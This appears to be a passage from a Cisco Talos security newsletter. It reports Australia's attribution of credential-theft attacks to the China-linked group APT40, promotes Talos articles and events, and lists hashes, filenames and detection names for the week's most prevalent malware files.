**The Australian government blamed a Chinese state-sponsored actor for being behind a series of cyber attacks and data breaches dating back to 2022.** The group, known as APT40, is allegedly the perpetrator behind the theft of usernames and passwords from two unnamed Australian networks two years ago. A newly released report from the Australian Cyber Security Centre said APT40 conducts malicious cyber operations for China’s Ministry of State Security, the main agency in China in charge of foreign intelligence. The report says that the actor tries to steal sensitive information by infecting older, and sometimes even inactive, computers that are still connected to sensitive networks. Chinese authorities immediately denied the accusations. Intelligence agencies in Canada, New Zealand, the U.S. and the U.K. co-authored the report. New Zealand’s government previously accused APT40 of targeting its parliamentary services and counsel office in 2021 and stealing sensitive information. (NBC News, Voice of America) 

**Can’t get enough Talos? **

*   Upstream’s 2024 Global Automotive Cybersecurity Report (featuring contributions from Cisco Security)
*   Hidden between the tags: Insights into spammers’ evasion techniques in HTML Smuggling 
*   How do cryptocurrency drainer phishing scams work? 
*   15 vulnerabilities discovered in software development kit for wireless routers 
*   Largest Patch Tuesday in 3 months includes 5 critical vulnerabilities 
*   Cisco Talos details latest tactics employed by prolific ransomware groups 
*   Ransomware Groups Prioritize Defense Evasion for Data Exfiltration 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** 8a366b1d30dd4d03ad8c5c18d0fb978d00d16f5f465bd59db6e09b034775c3ec   
**MD5:** 4fca837855b3bced7559889adb41c4b7   
**Typical Filename:** UIHost32.exe   
**Claimed Product:** McAfee WebAdvisor   
**Detection Name:** Trojan.Miner.ED 

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** 484c74d529eb1551fc2ddfe3c821a7a87113ce927cf22d79241030c2b4a4aa74  
**MD5:** dc30cfd21bbb742c10e3621d5b506780  
**Typical Filename:** KMS-R@1nHook.exe  
**Claimed Product:** N/A  
**Detection Name:** W32.File.MalParent